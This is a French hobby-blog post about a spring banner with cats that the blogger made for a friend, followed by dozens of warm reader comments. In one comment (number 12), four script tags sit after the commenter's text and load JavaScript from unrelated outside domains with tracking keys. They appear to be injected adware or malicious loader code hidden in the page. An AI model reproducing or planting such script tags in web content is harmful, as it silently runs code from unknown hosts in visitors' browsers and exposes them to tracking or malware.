• Ma Bannière pour Mamichat ♥

     

     

    Ma Bannière pour Mamichat ♥

     

     

     




     

     

     

    Ma Bannière pour Mamichat ♥

     

     

     

    Décliné en "Merci pour votre commentaire" à retrouver dans la Rubrique du même nom "Merci Visite"-"Divers" ICI

     

     

    Voici la demande d'Hélène (Mamichat) :

    " (...) J'ai une  soudaine envie de changer ma bannière lol puisque l'hiver n'est pas venu ! peux tu STP m'en créer une avec des fleurs de printemps la nature et bien sûr... chat ou chats !!! (...) "

     

     

     

     

    Ma Bannière pour Mamichat ♥

     

     

    Cliquez sur la bannière pour la voir en taille réelle...

     

     

    Ma Bannière pour Mamichat ♥

     

     

    Voici le fond...

     

     

    Ma Bannière pour Mamichat ♥

     

     

    Voici la signature...

     

     

    Ma Bannière pour Mamichat ♥

     

     

     

     

    Ma Bannière pour Mamichat ♥

     

     

    Voici ce que j'ai reçu de la part d'Hélène en remerciement...

     

     

    Ma Bannière pour Mamichat ♥

     

     

    Ma Bannière pour Mamichat ♥

     

     

     

    Que c'est beau ♥♥♥ Je suis touchée de ton envoi et je te redis ici

     

     

    Ma Bannière pour Mamichat ♥

     

     

     

     

    Ma Bannière pour Mamichat ♥

     

     

    Pour visiter son blog cliquez...

     

     

    Ma Bannière pour Mamichat ♥

     

     

    Ma Bannière pour Mamichat ♥

     

     

    Hier j'ai changé de free box, il a fallu l'attendre et reparamétrer les ordinateurs, une fois installée, donc, pas ou peu d'internet, pas suffisamment pour vous visiter toutes.... Donc, maintenant je vais vous rendre visite avec, j'espère, un débit plus rapide....

     

     

    Ma Bannière pour Mamichat ♥

     

     

     

    A retrouver dans la Rubrique "Bisous"-"Divers" ICI

     

     

    Ma Bannière pour Mamichat ♥

     

     

     

    A retrouver dans la Rubrique "Bonne Journée"-"Divers" ICI

     

     

     


    Tags Tags : , , , , ,
  • Commentaires

    39
    Mercredi 11 Mars 2020 à 11:15

    voila une bannière tres chat leureuse

    bisous

    38
    Lundi 9 Mars 2020 à 23:38

    Bonne semaine ma belle Valie, gros bisou tendresse !

    37
    Lundi 9 Mars 2020 à 19:51

    Bonsoir ma chère Valie

    Merci pour tes gentilles visites j'espère que tu vas bien , super si tu as plus de débit avec ton internet

    c'est plus agréable quand on a des blogs

    Bonne et douce soirée et gros bisous

    ton amie Janine

    36
    Lundi 9 Mars 2020 à 18:39

    ta bannière est très belle et un beau remerciement de Mamichat. bonne soirée bisous liliane

    35
    Lundi 9 Mars 2020 à 17:34

    Très jolie bannière j'adore les couleurs .Bravo pour tes créations .Bisous

    34
    Lundi 9 Mars 2020 à 10:27

    bonjour Valie tu vas bien

    tu fais toujours de belles choses

    et de belles bannieres

    belle journée et gros bisous

    Elyci

    33
    Gaelle
    Dimanche 8 Mars 2020 à 13:50
    Je ne vois pas mon commentaire safficher...... Je vous felicitais toutes les deux pour ce bel échange.
    Biz
    Gaelle
    32
    Gaelle
    Dimanche 8 Mars 2020 à 13:49
    Ta bannière si jolie encore une fois méritait bien un joli remerciement. Bel echange !
    Biz
    Gaelle
    31
    Samedi 7 Mars 2020 à 22:34

    Que dire, que dire si ce n'est que vous vous êtes faites, à l'une comme à l'autre, un très beau cadeau de par ses échanges vraiment très réussis. Bisous à toi et bon dimanche

    30
    Samedi 7 Mars 2020 à 20:26

    Bonsoir mon amie

    Je te souhaite une bonne soirée et un bon dimanche

    bonne fête des femmes à toi aussi

    gros bisous d'amitié

    Janine

    29
    Samedi 7 Mars 2020 à 17:57

    Coucou Valie, de bien belles créations, bravo à tous. Bon week-end à vous tous. Bizzzzz

     

    28
    Samedi 7 Mars 2020 à 14:04

    Jolie bannière pour Mamichat et très beaux cadeaux  de remerciement de sa part bien mérités pour toi

    Passe un bon week-end

    Bisous

    27
    Samedi 7 Mars 2020 à 08:29

    Waouh vous avez fait des merveilles les filles. Bravo à vous deux. BISOUS

    26
    Tite-C.
    Vendredi 6 Mars 2020 à 21:34

    https://i.postimg.cc/2jXC91Rr/valie.gifpour ta nouvelle bannière.  J'adoore ce que tu as fait pour mamichat car j'aime les chats comme tu le sais.  Je te souhaite uneMa Bannière pour Mamichat ♥ 

    25
    Vendredi 6 Mars 2020 à 21:16

    Cette bannière est vraiment top avec tous ces beaux minous, j'aime vraiment beaucoup.

    Et moi qui cartonne je dis que ce protège carnet est top dans la réalisation et le choix des couleurs !

    bon week-end ; bisous / Nicole

    24
    Vendredi 6 Mars 2020 à 20:45

    Tu as gâtée Mamichat avec cette superbe bannière joliment fleurie bravo

    Hélène t'as bien gâtée avec ces belles créations bravo à elle aussi

    Gros bisous Pierrette67

    23
    Qinoa
    Vendredi 6 Mars 2020 à 19:03
    Très joli échange
    Bzz
    22
    Vendredi 6 Mars 2020 à 17:13

    Elle est vraiment adorable cette bannière, j'aime beaucoup ma belle Valie. Et ce que tu as reçu est magnifique aussi. Passe une belle fin de journée, bisou rose tendresse !

    21
    Vendredi 6 Mars 2020 à 15:02

    Bonjour ma chère Valie

    Je suis éblouie par la belle bannière que tu as fait pour ton amie avec tous ces chats elle est superbe.

    J'espère que tu vas bien et je te souhaite une bonne après-midi et un agréable week-end

    gros bisous

    Janine

    20
    Vendredi 6 Mars 2020 à 14:12

    Superbe  bannière  bien  personnalisée   bravo  !!

      gros  bisous

    19
    Vendredi 6 Mars 2020 à 13:44

    Très belle bannière pour ton Amie quant à ses créations en remerciements elles sont Superbes & très soignées, contente pour vous 2 du coup !!!

    Doux Bisous.

    18
    Vendredi 6 Mars 2020 à 13:29

    wouaahahh c'est super beau!!! 

    bravo pour ton travail 

    passe un beau weekend

    bisous

    17
    Vendredi 6 Mars 2020 à 13:15
    Une très chouette bannière encore et bien remercier avec une très belle carte originale j aime beaucoup
    Tu as la fibre qui s installe c est ça ?
    Nous on a hâte ça coupe ca rame tout le temps c est ch....
    Bisous bon apm
    16
    Vendredi 6 Mars 2020 à 13:14

     bannière qui va bien à Mamichat et un joli retour, bravo !

    Bisous.

    15
    marianne pirotte
    Vendredi 6 Mars 2020 à 12:49

    Une superbe bannière, je l'avais vu sur son blog !!

    Sa carte est de toute beauté, tu le mérites tellement pour tous ce que tu fais .

    Je ne t'oublie pas non plus pour te remercier, je t'envois tout ça à ton annif

    Gros bisous

    Marianne

    14
    Vendredi 6 Mars 2020 à 12:10

    ta bannière est adorable et comme tu devais être heureuse de recevoir les jolies créations de ton amie. Je te souhaite une bonne journée Valie et je t'envoie plein de bisous d'amitié.

    13
    Vendredi 6 Mars 2020 à 11:08

    C'est super jolie aussi bien ta bannière que sa carte. Bravo à toutes les deux. 

    Bises

    thaly

    12
    mamijojo77100
    Vendredi 6 Mars 2020 à 11:03

    ah je retente un com... TU as realise a nouveau une tres belle banniere por helene et en retour j aime bcp sa carte pliable et son carnet et en plus mauve je craque.. BISOUS auj. un peu de soleil ....!!!joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1583488781299" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>
    11
    Vendredi 6 Mars 2020 à 10:54

    une bannière qui lui ressemble, bravo! Et de belles créas en remerciements! Bises Nadine

    10
    Jour de Mai
    Vendredi 6 Mars 2020 à 10:34

    Coucou Valie, 

    Je comprends mieux pourquoi on ne t'a pas vue hier. J'espère vraiment que le débit est meilleur. 

    Bravo encore pour cette ravissante bannière, elle sent le printemps et tous ces chats, que Mamichat, adorent, elle doit être comblée. C'est encore une réussite. 

    Et les cadeaux sont très jolis, quel raffinement. Bravo également. 

    Excellent vendredi, après-midi avec ta puce et surtout bon week end. J'espère qu'il y aura un peu de soleil. 

    On garde l'espoir. 

    Gros bisous ♥♥♥♥

    LN

    9
    Vendredi 6 Mars 2020 à 10:31
    Dane

    ta nouvelle page est très jolie Valie c' est pleins de douceur bravo et la bannière de mamiechat est tout aussi jolie bravo tu es douée a bientôt bisous

    8
    Jeannine (cristal24)
    Vendredi 6 Mars 2020 à 10:24

    Coucou Valie,

    Elle est très belle la bannière que tu as faite pour Hélène; j'aime beaucoup tous ces chats.

    Eh! oui, tout le monde veut voir arriver le printemps.

    Bel envoi de Hélène; c'est joli ce qu'elle a fait.

    Bravo à vous 2.

    Bonne journée et bonne fin de semaine, en espérant que la pluie arrête un peu de tomber pour laisser place enfin au soleil.

    A bientôt.  Bises.

    Jeannine

     

    7
    Vendredi 6 Mars 2020 à 10:11

    j'adore la bannière que tu m'as faite ! encore merci

    je suis contente si mes ptites créas t'ont plu

    bisous

    6
    Jacline-H-49
    Vendredi 6 Mars 2020 à 10:06

    Bonjour ma Valie,

    elle est merveilleuse cette bannière confectionnée pour Mamichats, j'ai vraiment l'impression d'être dans ce jardin printanier, avec des minous qu'elle adore.

    Elle-même t'a fait une bien jolie carte, vous êtes douées et inventives, je vous félicite.

    Bonne journée, il pleut encore en Anjou, y aura-t-il une fin ? 

    GROS BISOUS TENDRESSE de 

    Jacline 

     

    5
    Vendredi 6 Mars 2020 à 09:57

    Bonjour

    Une magnifique bannière pour Hélène(mamichat)

    bravo à toi Valie et à mamichat

    Bon week-end bises

    4
    Vendredi 6 Mars 2020 à 09:56

    oh doucement doucement, c'est le week end!!!! superbe ce que tu as reçu et superbe banière également, bravo!! plein de bisous bon week end

    3
    Vendredi 6 Mars 2020 à 09:23

    Une belle création d'amitié pour te remercier d'une belle création d'amitié !!
    Tu as fait un joli environnement pour ton Amie !
    C'est pour des choses comme ça que je ne me décide pas à quitter la blogosphère !
    Gros Bisous

    2
    Vendredi 6 Mars 2020 à 09:21

    Bonjour Valie, encore un jolie bannière avec des couleurs printanières et puis les chats qui se baladent c'est vraiment très réussi, tout comme la carte de Mamichat qui est superbe ....

    Je te souhaite un bon vendredi

    bisous de Pat

    1
    Vendredi 6 Mars 2020 à 09:12

    Les fleurs, la nature, les chats, tout y est, mission joliment accomplie, bravo Valie, tu as encore fait plaisir à une copinette.

    Son envoi est superbe, bravo à elle aussi, j'aime beaucoup le pliage de sa carte.

    Gros bisous, bonne journée.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :